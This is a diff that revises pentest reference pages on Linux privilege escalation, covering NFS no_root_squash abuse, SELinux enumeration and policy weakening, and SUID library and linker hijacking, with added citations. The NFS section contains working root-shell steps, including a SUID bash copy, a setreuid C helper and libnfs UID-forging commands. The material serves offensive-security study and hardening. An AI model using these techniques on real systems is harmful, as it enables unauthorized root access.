+- [17] [capability.conf(5) - Ubuntu Manpage](https://manpages.ubuntu.com/manpages/bionic/man5/capability.conf.5.html)
+- [18] [systemd.exec(5) - Linux manual page](https://man7.org/linux/man-pages/man5/systemd.exec.5.html)
+- [19] [Running containers - Docker Docs](https://docs.docker.com/engine/containers/run/)
+- [20] [docker container run - Docker Docs](https://docs.docker.com/reference/cli/docker/container/run)
+- [21] [cap_text_formats(7) - Linux manual page](https://man7.org/linux/man-pages/man7/cap_text_formats.7.html)
+- [22] [getpcaps(8) - Linux manual page](https://man7.org/linux/man-pages/man8/getpcaps.8.html)
+- [23] [getcap(8) - Linux manual page](https://man7.org/linux/man-pages/man8/getcap.8.html)
+- [24] [amicontained](https://github.com/genuinetools/amicontained)
+- [25] [setcap(8) - Linux manual page](https://man7.org/linux/man-pages/man8/setcap.8.html)
+- [26] [capsh(1) - Linux manual page](https://man7.org/linux/man-pages/man1/capsh.1.html)
+- [27] [ioctl_iflags(2) - Linux manual page](https://man7.org/linux/man-pages/man2/ioctl_iflags.2.html)
 
 {{#include ../../banners/hacktricks-training.md}}
-

--- a/src/linux-hardening/interesting-files-permissions/nfs-no_root_squash-misconfiguration-pe.md
+++ b/src/linux-hardening/interesting-files-permissions/nfs-no_root_squash-misconfiguration-pe.md
@@ -1,16 +1,14 @@
 # NFS No Root Squash Misconfiguration Privilege Escalation
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Squashing Basic Info
 
-NFS will usually (specially in linux) trust the indicated `uid` and `gid` by the client conencting to access the files (if kerberos is not used). However, there are some configurations that can be set in the server to **change this behavior**:
+With NFS AUTH_SYS/AUTH_UNIX, the server bases file-permission checks on the `uid` and `gid` supplied in each RPC request. Other security flavors, such as Kerberos, use different credentials, and the server can map numeric credentials before checking permissions.<sup>[[4]](#references)[[5]](#references)</sup>
 
-- **`all_squash`**: It squashes all accesses mapping every user and group to **`nobody`** (65534 unsigned / -2 signed). Therefore, everyone is `nobody` and no users are used.
-- **`root_squash`/`no_all_squash`**: This is default on Linux and **only squashes access with uid 0 (root)**. Therefore, any `UID` and `GID` are trusted but `0` is squashed to `nobody` (so no root imperonation is possible).
-- **``no_root_squash`**: This configuration if enabled doesn't even squash the root user. This means that if you mount a directory with this configuration you can access it as root.
+- **`all_squash`**: Maps every UID and GID to the anonymous account, which defaults to `nobody` (65534) on Linux. `no_all_squash` is the default for non-root requests.<sup>[[4]](#references)</sup>
+- **`root_squash`**: This is the default on Linux and maps requests with UID/GID 0 (root) to the anonymous account; other UIDs and GIDs are not squashed.<sup>[[4]](#references)</sup>
+- **`no_root_squash`**: Disables root squashing, so requests with UID/GID 0 can be evaluated as root on the server.<sup>[[4]](#references)</sup>
 
-In the **/etc/exports** file, if you find some directory that is configured as **no_root_squash**, then you can **access** it from **as a client** and **write inside** that directory **as** if you were the local **root** of the machine.
+If an allowed client can mount a writable export in **`/etc/exports`** configured with **`no_root_squash`**, its UID/GID 0 requests can write there as the server's root user.<sup>[[4]](#references)</sup>
 
 For more information about **NFS** check:
 
@@ -23,9 +21,8 @@ For more information about **NFS** check:
 ### Remote Exploit
 
 Option 1 using bash:
-- **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder the **/bin/bash** binary and giving it **SUID** rights, and **executing from the victim** machine that bash binary.
-    - Note that to be root inside the NFS share, **`no_root_squash`** must be configured in the server.
-    - However, if not enabled, you could escalate to other user by copying the binary to the NFS share and giving it the SUID permission as the user you want to escalate to.
+- On an allowed client, mount a writable export as root, copy **`/bin/bash`** into it, set its **SUID** bit, and execute it from a victim mount that does not use `nosuid`.<sup>[[2]](#references)[[4]](#references)</sup>
+    - For the uploaded file to remain owned by root, the server must use **`no_root_squash`**. If root is squashed, a SUID binary for another account is possible only when the client can legitimately create or own it with that account's numeric UID/GID.<sup>[[4]](#references)</sup>
 
 ```bash
 #Attacker, as root user
@@ -40,8 +37,8 @@ cd <SHAREDD_FOLDER>
 ./bash -p #ROOT shell
 ```
 
-Option 2 using c compiled code:
-- **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder our come compiled payload that will abuse the SUID permission, give to it **SUID** rights, and **execute from the victim** machine that binary (you can find here some[ C SUID payloads](../processes-crontab-systemd-dbus/payloads-to-execute.md#c)).
+Option 2 using compiled C code:
+- Mount the directory from an allowed client, copy in a compiled payload that abuses SUID permissions, set its **SUID** bit, and execute it from the victim (see some [C SUID payloads](../processes-crontab-systemd-dbus/payloads-to-execute.md#c)).
     - Same restrictions as before
 
 ```bash
@@ -62,17 +59,16 @@ cd <SHAREDD_FOLDER>
 
 > [!TIP]
 > Note that if you can create a **tunnel from your machine to the victim machine you can still use the Remote version to exploit this privilege escalation tunnelling the required ports**.\
-> The following trick is in case the file `/etc/exports` **indicates an IP**. In this case you **won't be able to use** in any case the **remote exploit** and you will need to **abuse this trick**.\
-> Another required requirement for the exploit to work is that **the export inside `/etc/export`** **must be using the `insecure` flag**.\
-> --_I'm not sure that if `/etc/export` is indicating an IP address this trick will work_--
+> The following trick is useful when `/etc/exports` restricts the export to the victim's IP: the remote client cannot mount it, but the local technique can operate through the share already mounted on the allowed host.<sup>[[2]](#references)</sup>\
+> For this unprivileged libnfs method, the export in **`/etc/exports`** must use the `insecure` flag so the process can use a non-reserved source port; `secure` is the default, although a process able to bind a reserved port does not need this option.<sup>[[1]](#references)[[4]](#references)</sup>
 
 ### Basic Information
 
-The scenario involves exploiting a mounted NFS share on a local machine, leveraging a flaw in the NFSv3 specification which allows the client to specify its uid/gid, potentially enabling unauthorized access. The exploitation involves using [libnfs](https://github.com/sahlberg/libnfs), a library that allows for the forging of NFS RPC calls.<sup>[[1]](#references)</sup>
+An NFSv3 AUTH_UNIX client includes its effective UID, GID, and groups in each call, and the server uses them for permission checks. This local technique abuses that model by forging the RPC credentials through [libnfs](https://github.com/sahlberg/libnfs); its preload module supports overriding the UID/GID in the NFS context.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[5]](#references)</sup>
 
 #### Compiling the Library
 
-The library compilation steps might require adjustments based on the kernel version. In this specific case, the fallocate syscalls were commented out. The compilation process involves the following commands:
+The libnfs example may require adjustments for the target kernel; the walkthrough used here specifically notes commenting out the fallocate syscalls before compiling the preload module.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
 ./bootstrap
@@ -83,7 +79,7 @@ gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib
 
 #### Conducting the Exploit
 
-The exploit involves creating a simple C program (`pwn.c`) that elevates privileges to root and then executing a shell. The program is compiled, and the resulting binary (`a.out`) is placed on the share with suid root, using `ld_nfs.so` to fake the uid in the RPC calls:
+The example creates a small C helper that launches a shell, then places it on the share and uses `ld_nfs.so` with UID 0 in the NFS context to make it SUID-root.<sup>[[1]](#references)[[2]](#references)</sup>
 
 1. **Compile the exploit code:**
 
@@ -93,7 +89,7 @@ int main(void){setreuid(0,0); system("/bin/bash"); return 0;}
 gcc pwn.c -o a.out
 ```
 
-2. **Place the exploit on the share and modify its permissions by faking the uid:**
+2. **Place the exploit on the share and modify its permissions by faking the UID**.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
 LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so cp ../a.out nfs://nfs-server/nfs_root/
@@ -102,7 +98,7 @@ LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs:
 LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://nfs-server/nfs_root/a.out
 ```
 
-3. **Execute the exploit to gain root privileges:**
+3. **Execute the exploit to gain root privileges**.<sup>[[2]](#references)</sup>
 
 ```bash
 /mnt/share/a.out
@@ -111,7 +107,7 @@ LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs:/
 
 ### Bonus: NFShell for Stealthy File Access
 
-Once root access is obtained, to interact with the NFS share without changing ownership (to avoid leaving traces), a Python script (nfsh.py) is used. This script adjusts the uid to match that of the file being accessed, allowing for interaction with files on the share without permission issues:<sup>[[1]](#references)</sup>
+Once root access is obtained, this `nfsh.py` pattern sets the effective UID to the target file's UID before running a command, allowing access without recursively changing ownership.<sup>[[2]](#references)</sup>
 
 ```python
 #!/usr/bin/env python
@@ -141,6 +137,10 @@ drwxr-x---  6 1008 1009 1024 Apr  5  2017 9.3_old
 
 ## References
 
-- [1] [A tale of a lesser known NFS privesc](https://www.errno.fr/nfs_privesc.html)
+- [1] [lnv42/libnfs](https://github.com/lnv42/libnfs)
+- [2] [A tale of a lesser known NFS privesc](https://www.errno.fr/nfs_privesc.html)
+- [3] [sahlberg/libnfs](https://github.com/sahlberg/libnfs)
+- [4] [exports(5) — Linux manual page](https://man7.org/linux/man-pages/man5/exports.5.html)
+- [5] [RFC 1813: NFS Version 3 Protocol Specification](https://datatracker.ietf.org/doc/html/rfc1813)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/interesting-files-permissions/selinux.md
+++ b/src/linux-hardening/interesting-files-permissions/selinux.md
@@ -1,10 +1,8 @@
 # SELinux
 
-{{#include ../../banners/hacktricks-training.md}}
+SELinux is a **label-based Mandatory Access Control (MAC)** system. In practice, this means that even if DAC permissions, groups, or Linux capabilities look enough for an action, the kernel can still deny it because the **source context** is not allowed to access the **target context** with the requested class/permission.<sup>[[1]](#references)</sup>
 
-SELinux is a **label-based Mandatory Access Control (MAC)** system. In practice, this means that even if DAC permissions, groups, or Linux capabilities look enough for an action, the kernel can still deny it because the **source context** is not allowed to access the **target context** with the requested class/permission.
-
-A context usually looks like:
+A context usually looks like:<sup>[[1]](#references)</sup>
 
 ```text
 user:role:type:level
@@ -12,7 +10,7 @@ system_u:system_r:httpd_t:s0
 unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
 ```
 
-From a privesc perspective, the `type` (domain for processes, type for objects) is usually the most important field:
+From a privesc perspective, the `type` (domain for processes, type for objects) is usually the most important field:<sup>[[1]](#references)</sup>
 
 - A process runs in a **domain** such as `unconfined_t`, `staff_t`, `httpd_t`, `container_t`, `sysadm_t`
 - Files and sockets have a **type** such as `admin_home_t`, `shadow_t`, `httpd_sys_rw_content_t`, `container_file_t`
@@ -20,7 +18,7 @@ From a privesc perspective, the `type` (domain for processes, type for objects) 
 
 ## Fast Enumeration
 
-If SELinux is enabled, enumerate it early because it can explain why common Linux privesc paths fail or why a privileged wrapper around a "harmless" SELinux tool is actually critical:
+If SELinux is enabled, enumerate it early because it can explain why common Linux privesc paths fail or why a privileged wrapper around a "harmless" SELinux tool is actually critical:<sup>[[1]](#references)</sup>
 
 ```bash
 getenforce
@@ -31,7 +29,7 @@ cat /proc/self/attr/current
 ls -Zd / /root /home /tmp /etc /var/www 2>/dev/null
 ```
 
-Useful follow-up checks:
+Useful follow-up checks:<sup>[[1]](#references)[[3]](#references)[[4]](#references)[[7]](#references)[[12]](#references)</sup>
 
 ```bash
 # Installed policy modules and local customizations
@@ -49,7 +47,7 @@ matchpathcon -V /path/of/interest 2>/dev/null
 restorecon -n -v /path/of/interest 2>/dev/null
 ```
 
-Interesting findings:
+Interesting findings:<sup>[[1]](#references)[[3]](#references)[[7]](#references)[[19]](#references)</sup>
 
 - `Disabled` or `Permissive` mode removes most of the value of SELinux as a boundary.
 - `unconfined_t` usually means SELinux is present but not meaningfully constraining that process.
@@ -63,7 +61,7 @@ SELinux is much easier to attack or bypass when you can answer two questions:
 1. **What can my current domain access?**
 2. **What domains can I transition into?**
 
-The most useful tools for this are `sepolicy` and **SETools** (`seinfo`, `sesearch`, `sedta`):<sup>[[2]](#references)</sup>
+The most useful tools for this are `sepolicy` and **SETools** (`seinfo`, `sesearch`, `sedta`):<sup>[[2]](#references)[[9]](#references)</sup>
 
 ```bash
 # Transition graph from the current domain
@@ -85,13 +83,13 @@ This is especially useful when a host uses **confined users** rather than mappin
 - reachable admin domains such as `sysadm_t`, `secadm_t`, `webadm_t`
 - `sudoers` entries using `ROLE=` or `TYPE=`
 
-If `sudo -l` contains entries like this, SELinux is part of the privilege boundary:
+If `sudo -l` contains entries like this, SELinux is part of the privilege boundary:<sup>[[3]](#references)</sup>
 
 ```text
 linux_user ALL=(ALL) ROLE=webadm_r TYPE=webadm_t /bin/bash
 ```
 
-Also check whether `newrole` is available:
+Also check whether `newrole` is available:<sup>[[3]](#references)[[10]](#references)[[11]](#references)</sup>
 
 ```bash
 sudo -l
@@ -99,19 +97,19 @@ which newrole runcon
 newrole -l 2>/dev/null
 ```
 
-`runcon` and `newrole` are not automatically exploitable, but if a privileged wrapper or a `sudoers` rule lets you select a better role/type, they become high-value escalation primitives.
+`runcon` and `newrole` are not automatically exploitable, but if a privileged wrapper or a `sudoers` rule lets you select a better role/type, they become high-value escalation primitives.<sup>[[3]](#references)[[10]](#references)[[11]](#references)</sup>
 
 ## Files, Relabeling, and High-Value Misconfigurations
 
-The most important operational difference between common SELinux tools is:<sup>[[1]](#references)</sup>
+The most important operational difference between common SELinux tools is:<sup>[[1]](#references)[[6]](#references)[[7]](#references)[[8]](#references)</sup>
 
 - `chcon`: temporary label change on a specific path
 - `semanage fcontext`: persistent path-to-label rule
 - `restorecon` / `setfiles`: apply the policy/default label again
 
-This matters a lot during privesc because **relabeling is not just cosmetic**. It can turn a file from "blocked by policy" into "readable/executable by a privileged confined service".
+This matters a lot during privesc because **relabeling is not just cosmetic**. It can turn a file from "blocked by policy" into "readable/executable by a privileged confined service".<sup>[[1]](#references)[[7]](#references)[[8]](#references)</sup>
 
-Check for local relabel rules and relabel drift:
+Check for local relabel rules and relabel drift:<sup>[[1]](#references)[[7]](#references)[[8]](#references)</sup>
 
 ```bash
 grep -R . /etc/selinux/*/contexts/files/file_contexts.local 2>/dev/null
@@ -119,7 +117,7 @@ restorecon -nvr / 2>/dev/null | head -n 50
 matchpathcon -V /etc/passwd /etc/shadow /usr/local/bin/* 2>/dev/null
 ```
 
-One subtle but useful detail: plain `restorecon` does **not always fully revert a suspicious label**. If the target type is in `customizable_types`, you may need `-F` to force a full reset. From an offensive perspective, this explains why an unusual `chcon` can sometimes survive a casual "we already ran restorecon" cleanup.
+One subtle but useful detail: plain `restorecon` does **not always fully revert a suspicious label**. If the target type is in `customizable_types`, you may need `-F` to force a full reset. From an offensive perspective, this explains why an unusual `chcon` can sometimes survive a casual "we already ran restorecon" cleanup.<sup>[[8]](#references)</sup>
 
 ```bash
 grep -R . /etc/selinux/*/contexts/customizable_types 2>/dev/null | head
@@ -127,16 +125,16 @@ restorecon -n -v /path/of/interest 2>/dev/null
 restorecon -F -v /path/of/interest 2>/dev/null
 ```
 
-High-value commands to hunt in `sudo -l`, root wrappers, automation scripts, or file capabilities:
+High-value commands to hunt in `sudo -l`, root wrappers, automation scripts, or file capabilities:<sup>[[1]](#references)[[4]](#references)[[5]](#references)[[12]](#references)[[13]](#references)[[14]](#references)</sup>
 
 ```bash
 which semanage restorecon chcon setfiles semodule audit2allow runcon newrole setsebool load_policy 2>/dev/null
 getcap -r / 2>/dev/null | grep -E 'cap_mac_admin|cap_mac_override'
 ```
 
-If either MAC capability shows up, cross-check the [Linux capabilities page](linux-capabilities.md) as well; `cap_mac_admin` and `cap_mac_override` are unusual but directly relevant when SELinux is part of the boundary.
+If either MAC capability shows up, cross-check the [Linux capabilities page](linux-capabilities.md) as well; the Linux capabilities documentation describes `cap_mac_admin` and `cap_mac_override` as Smack-specific, so do not assume that their names alone bypass SELinux.<sup>[[5]](#references)</sup>
 
-Especially interesting:
+Especially interesting:<sup>[[1]](#references)[[4]](#references)[[7]](#references)[[8]](#references)[[12]](#references)[[13]](#references)</sup>
 
 - `semanage fcontext`: persistently changes what label a path should receive
 - `restorecon` / `setfiles`: reapplies those changes at scale
@@ -145,14 +143,14 @@ Especially interesting:
 - `setsebool -P`: permanently changes policy booleans
 - `load_policy`: reloads the active policy
 
-These are often **helper primitives**, not standalone root exploits. Their value is that they let you:
+These are often **helper primitives**, not standalone root exploits. Their value is that they let you:<sup>[[1]](#references)[[4]](#references)[[7]](#references)[[8]](#references)[[12]](#references)[[13]](#references)[[14]](#references)</sup>
 
 - make a target domain permissive
 - broaden access between your domain and a protected type
 - relabel attacker-controlled files so a privileged service can read or execute them
 - weaken a confined service enough that an existing local bug becomes exploitable
 
-Example checks:
+Example checks:<sup>[[1]](#references)[[7]](#references)[[8]](#references)</sup>
 
 ```bash
 # If sudo exposes semanage/restorecon, think in terms of policy abuse
@@ -163,18 +161,18 @@ semanage fcontext -C -l 2>/dev/null
 restorecon -n -v /usr/local/bin /opt /srv /var/www 2>/dev/null
 ```
 
-If you can load a policy module as root, you usually control the SELinux boundary:
+If you can load a policy module as root, you usually control the SELinux boundary:<sup>[[1]](#references)[[4]](#references)[[14]](#references)</sup>
 
 ```bash
 ausearch -m AVC,USER_AVC -ts recent 2>/dev/null | audit2allow -M localfix
 sudo semodule -i localfix.pp
 ```
 
-That is why `audit2allow`, `semodule`, and `semanage permissive` should be treated as sensitive admin surfaces during post-exploitation. They can silently convert a blocked chain into a working one without changing classic UNIX permissions.
+That is why `audit2allow`, `semodule`, and `semanage permissive` should be treated as sensitive admin surfaces during post-exploitation. They can silently convert a blocked chain into a working one without changing classic UNIX permissions.<sup>[[1]](#references)[[4]](#references)[[12]](#references)[[14]](#references)</sup>
 
 ## Hidden Denials and Module Extraction
 
-A very common offensive frustration is a chain that fails with a bland `EACCES` while the expected AVC denial never appears. `dontaudit` rules may be hiding the exact permission you need. If you can run `semodule` through `sudo` or another privileged wrapper, temporarily disabling `dontaudit` can turn a silent failure into a precise policy clue:<sup>[[4]](#references)</sup>
+A very common offensive frustration is a chain that fails with a bland `EACCES` while the expected AVC denial never appears. `dontaudit` rules may be hiding the exact permission you need. If you can run `semodule` through `sudo` or another privileged wrapper, temporarily disabling `dontaudit` can turn a silent failure into a precise policy clue:<sup>[[4]](#references)[[15]](#references)</sup>
 
 ```bash
 # Rebuild policy without dontaudit rules, trigger the action again, then inspect AVCs
@@ -187,11 +185,11 @@ semodule -lfull 2>/dev/null
 semodule -E --cil <module_name> 2>/dev/null
 ```
 
-This is also useful for reviewing what local admins already changed. A small custom module or one-domain permissive rule is often the reason a target service behaves much more loosely than the base policy would suggest.
+This is also useful for reviewing what local admins already changed. A small custom module or one-domain permissive rule is often the reason a target service behaves much more loosely than the base policy would suggest.<sup>[[1]](#references)[[4]](#references)[[12]](#references)</sup>
 
 ## Audit Clues
 
-AVC denials are often offensive signal, not just defensive noise. They tell you:
+AVC denials are often offensive signal, not just defensive noise. They tell you:<sup>[[1]](#references)[[15]](#references)</sup>
 
 - which target object/type you hit
 - which permission was denied
@@ -203,13 +201,13 @@ ausearch -m AVC,USER_AVC,SELINUX_ERR -ts recent 2>/dev/null
 journalctl -t setroubleshoot --no-pager 2>/dev/null | tail -n 50
 ```
 
-If a local exploit or persistence attempt keeps failing with `EACCES` or strange "permission denied" errors despite root-looking DAC permissions, SELinux is usually worth checking before discarding the vector.
+If a local exploit or persistence attempt keeps failing with `EACCES` or strange "permission denied" errors despite root-looking DAC permissions, SELinux is usually worth checking before discarding the vector.<sup>[[1]](#references)</sup>
 
 ## SELinux Users
 
 There are SELinux users in addition to regular Linux users. Each Linux user is mapped to an SELinux user as part of the policy, which lets the system impose different allowed roles and domains on different accounts.<sup>[[3]](#references)</sup>
 
-Quick checks:
+Quick checks:<sup>[[3]](#references)</sup>
 
 ```bash
 id -Z
@@ -223,9 +221,9 @@ On many mainstream systems, users are mapped to `unconfined_u`, which reduces th
 
 ## SELinux in Containers
 
-Container runtimes commonly launch workloads in a confined domain such as `container_t` and label container content as `container_file_t`. If a container process escapes but still runs with the container label, host writes may still fail because the label boundary stayed intact.
+Container runtimes commonly launch workloads in a confined domain such as `container_t` and label container content as `container_file_t`. If a container process escapes but still runs with the container label, host writes may still fail because the label boundary stayed intact.<sup>[[1]](#references)[[17]](#references)</sup>
 
-Quick example:
+Quick example:<sup>[[16]](#references)[[18]](#references)</sup>
 
 ```shell
 $ podman run -d fedora sleep 100
@@ -235,11 +233,11 @@ LABEL
 system_u:system_r:container_t:s0:c647,c780
 ```
 
-The `c647,c780` part is not decoration. In many container deployments, runtimes dynamically assign MCS categories so that two processes running as `container_t` are still separated from each other. If an escape lands you in a host namespace but keeps the original category set, category mismatches can still explain why some host paths remain unreadable or unwritable.
+The `c647,c780` part is not decoration. In many container deployments, runtimes dynamically assign MCS categories so that two processes running as `container_t` are still separated from each other. If an escape lands you in a host namespace but keeps the original category set, category mismatches can still explain why some host paths remain unreadable or unwritable.<sup>[[17]](#references)</sup>
 
-Modern container operations worth noting:
+Modern container operations worth noting:<sup>[[16]](#references)[[17]](#references)</sup>
 
-- `--security-opt label=disable` can effectively move the workload to an unconfined container-related type such as `spc_t`
+- `--security-opt label=disable` turns off SELinux label separation for the container
 - bind mounts with `:z` / `:Z` trigger relabeling of the host path for shared/private container use
 - broad relabeling of host content can become a security issue on its own
 
@@ -255,5 +253,20 @@ This page keeps the container content short to avoid duplication. For the contai
 - [2] [SETools: Policy analysis tools for SELinux](https://github.com/SELinuxProject/setools)
 - [3] [Managing confined and unconfined users - RHEL 9 docs](https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/9/html/using_selinux/managing-confined-and-unconfined-users_using-selinux)
 - [4] [semodule(8) - Linux manual page](https://man7.org/linux/man-pages/man8/semodule.8.html)
+- [5] [capabilities(7) - Linux manual page](https://man7.org/linux/man-pages/man7/capabilities.7.html)
+- [6] [chcon(1) - Linux manual page](https://man7.org/linux/man-pages/man1/chcon.1.html)
+- [7] [semanage-fcontext(8) - Linux manual page](https://man7.org/linux/man-pages/man8/semanage-fcontext.8.html)
+- [8] [restorecon(8) - Linux manual page](https://man7.org/linux/man-pages/man8/restorecon.8.html)
+- [9] [sepolicy-transition(8) - Linux manual page](https://man7.org/linux/man-pages/man8/sepolicy-transition.8.html)
+- [10] [runcon(1) - Linux manual page](https://man7.org/linux/man-pages/man1/runcon.1.html)
+- [11] [newrole(1) - Linux manual page](https://man7.org/linux/man-pages/man1/newrole.1.html)
+- [12] [semanage-permissive(8) - Linux manual page](https://man7.org/linux/man-pages/man8/semanage-permissive.8.html)
+- [13] [setsebool(8) - Linux manual page](https://man7.org/linux/man-pages/man8/setsebool.8.html)
+- [14] [audit2allow(1) - Linux manual page](https://man7.org/linux/man-pages/man1/audit2allow.1.html)
+- [15] [ausearch(8) - Linux manual page](https://man7.org/linux/man-pages/man8/ausearch.8.html)
+- [16] [Podman run documentation](https://docs.podman.io/en/latest/markdown/podman-run.1.html)
+- [17] [Why you should be using Multi-Category Security for your Linux containers](https://www.redhat.com/en/blog/why-you-should-be-using-multi-category-security-your-linux-containers)
+- [18] [Podman top documentation](https://docs.podman.io/en/latest/markdown/podman-top.1.html)
+- [19] [selinux(8) - Linux manual page](https://man7.org/linux/man-pages/man8/selinux.8.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/interesting-files-permissions/suid-shared-library-and-linker-abuse.md
+++ b/src/linux-hardening/interesting-files-permissions/suid-shared-library-and-linker-abuse.md
@@ -1,14 +1,12 @@
 # SUID Shared Library and Linker Abuse
 
-{{#include ../../banners/hacktricks-training.md}}
-
-SUID binaries are usually reviewed for direct command execution, but custom SUID programs can also be vulnerable through the dynamic linker. The common theme is simple: a privileged executable loads code from a path or configuration that a lower-privileged user can influence.
+SUID binaries are usually reviewed for direct command execution, but custom SUID programs can also be vulnerable through the dynamic linker. The common theme is simple: a privileged executable loads code from a path or configuration that a lower-privileged user can influence.<sup>[[1]](#references)</sup>
 
 This page focuses on generic technique patterns: missing libraries, writable library directories, `RPATH`/`RUNPATH`, `LD_PRELOAD` through sudo, linker configuration, and SUID hardlink confusion.
 
 ## Fast Enumeration
 
-Start by finding unusual SUID files and checking whether they are dynamically linked:
+Start by finding unusual SUID files and checking whether they are dynamically linked:<sup>[[1]](#references)[[3]](#references)</sup>
 
 ```bash
 find / -perm -4000 -type f -ls 2>/dev/null
@@ -17,7 +15,7 @@ ldd /path/to/suid-binary 2>/dev/null
 readelf -d /path/to/suid-binary 2>/dev/null | egrep 'NEEDED|RPATH|RUNPATH'
 ```
 
-Focus on non-standard locations, custom application paths, binaries owned by root but outside package-managed directories, and dependencies loaded from writable directories.
+Focus on non-standard locations, custom application paths, binaries owned by root but outside package-managed directories, and dependencies loaded from writable directories.<sup>[[1]](#references)</sup>
 
 Useful writeability checks:
 
@@ -29,15 +27,15 @@ find / -writable -type d 2>/dev/null | head -n 50
 
 ## Missing Shared Object Injection
 
-Some custom SUID binaries try to load a shared object that does not exist. If the missing path is under a directory controlled by the attacker, the binary may load attacker-supplied code as the effective user.
+Some custom SUID binaries try to load a shared object that does not exist. If the missing path is under a directory controlled by the attacker, the binary may load attacker-supplied code as the effective user.<sup>[[1]](#references)</sup>
 
-Find failed library lookups:
+Find failed library lookups with `strace`'s syscall filter:<sup>[[2]](#references)</sup>
 
 ```bash
 strace -f -e trace=openat,access /path/to/suid-binary 2>&1 | grep -Ei 'ENOENT|\\.so'
 ```
 
-If the binary searches a writable path for `libexample.so`, a minimal proof library can use a constructor. Keep proof-of-impact harmless during validation:
+If the binary searches a writable path for `libexample.so`, a minimal proof library can use a constructor. Keep proof-of-impact harmless during validation:<sup>[[6]](#references)</sup>
 
 ```c
 #include <stdlib.h>
@@ -59,13 +57,13 @@ gcc -shared -fPIC proof.c -o /writable/path/libexample.so
 cat /tmp/suid-so-ran
 ```
 
-The exploitable condition is not the missing library alone. The attacker must be able to place a compatible shared object at a path the privileged loader will accept.
+The exploitable condition is not the missing library alone. The attacker must be able to place a compatible shared object at a path the privileged loader will accept.<sup>[[1]](#references)</sup>
 
 ## Writable Library Directory
 
-Sometimes all dependencies exist, but one of the directories used to resolve them is writable. This may allow replacing a loaded library or planting a higher-priority library with the same name.
+Sometimes all dependencies exist, but one of the directories used to resolve them is writable. This may allow replacing a loaded library or planting a higher-priority library with the same name.<sup>[[1]](#references)</sup>
 
-Review dependency paths:
+Review dependency paths:<sup>[[1]](#references)[[3]](#references)</sup>
 
 ```bash
 ldd /path/to/suid-binary 2>/dev/null
@@ -73,13 +71,13 @@ readelf -d /path/to/suid-binary 2>/dev/null | egrep 'NEEDED|RPATH|RUNPATH'
 namei -om /path/to/library.so
 ```
 
-If the directory is writable, validate with a copy-safe approach in a lab. Replacing system libraries on a live host can break authentication, package management, or boot-critical services.
+If the directory is writable, validate with a copy-safe approach in a lab. Replacing system libraries on a live host can leave concurrently starting processes with inconsistent library versions.<sup>[[8]](#references)</sup>
 
 ## RPATH and RUNPATH
 
-`RPATH` and `RUNPATH` are dynamic-section entries that tell the loader where to search for libraries. They are dangerous in SUID programs when they point to attacker-writable directories.
+`RPATH` and `RUNPATH` are dynamic-section entries that tell the loader where to search for libraries. They are dangerous in SUID programs when they point to attacker-writable directories.<sup>[[1]](#references)</sup>
 
-Detect them:
+Detect them:<sup>[[3]](#references)[[10]](#references)</sup>
 
 ```bash
 readelf -d /path/to/suid-binary | egrep 'RPATH|RUNPATH'
@@ -93,7 +91,7 @@ Example risky output:
 0x0000000000000001 (NEEDED)             Shared library: [libcustom.so]
 ```
 
-If `/opt/app/lib` is writable and the binary needs `libcustom.so`, the attacker may be able to place a malicious `libcustom.so` there:
+If `/opt/app/lib` is writable and the binary needs `libcustom.so`, the attacker may be able to place a malicious `libcustom.so` there:<sup>[[1]](#references)</sup>
 
 ```bash
 ls -ld /opt/app/lib
@@ -101,19 +99,19 @@ gcc -shared -fPIC proof.c -o /opt/app/lib/libcustom.so
 /path/to/suid-binary
 ```
 
-`RPATH` and `RUNPATH` are not identical in all resolution details, but for privilege-escalation review the practical question is the same: does the SUID binary search an attacker-writable directory for a library name?
+`RPATH` and `RUNPATH` are not identical in all resolution details, but for privilege-escalation review the practical question is the same: does the SUID binary search an attacker-writable directory for a library name?<sup>[[1]](#references)</sup>
 
 ## LD_PRELOAD, LD_LIBRARY_PATH and SUID
 
-For normal programs, `LD_PRELOAD` and `LD_LIBRARY_PATH` can force or influence shared object loading. For SUID programs, the dynamic loader normally enters secure-execution mode and ignores dangerous environment variables.
+For normal programs, `LD_PRELOAD` and `LD_LIBRARY_PATH` can force or influence shared object loading. For SUID programs, the dynamic loader normally enters secure-execution mode and ignores dangerous environment variables.<sup>[[1]](#references)</sup>
 
-This means a plain SUID binary is usually not vulnerable just because the user can set `LD_PRELOAD`:
+This means a plain SUID binary is usually not vulnerable just because the user can set `LD_PRELOAD`:<sup>[[1]](#references)</sup>
 
 ```bash
 LD_PRELOAD=/tmp/proof.so /path/to/suid-binary
 ```
 
-The common exception is sudo misconfiguration. If `sudo -l` shows that a variable such as `LD_PRELOAD` or `LD_LIBRARY_PATH` is preserved, a sudo-allowed command may load attacker-controlled code:
+The common exception is a sudo policy that permits setting or preserving loader variables for the target command. Inspect `sudo -l` for entries such as `env_keep+=LD_PRELOAD` or `env_keep+=LD_LIBRARY_PATH`; if the target is dynamically linked, it may load attacker-controlled code:<sup>[[4]](#references)[[5]](#references)</sup>
 
 ```bash
 sudo -l
@@ -121,7 +119,7 @@ sudo -l
 sudo LD_PRELOAD=/tmp/proof.so /allowed/command
 ```
 
-Do not confuse these cases:
+Do not confuse these cases; the loader and sudo policy rules above distinguish them:<sup>[[1]](#references)[[4]](#references)[[5]](#references)</sup>
 
 - `LD_PRELOAD` against a normal SUID binary: usually blocked by secure execution.
 - `LD_PRELOAD` preserved by sudo: potentially exploitable.
@@ -131,7 +129,7 @@ Do not confuse these cases:
 
 ## Linker Configuration
 
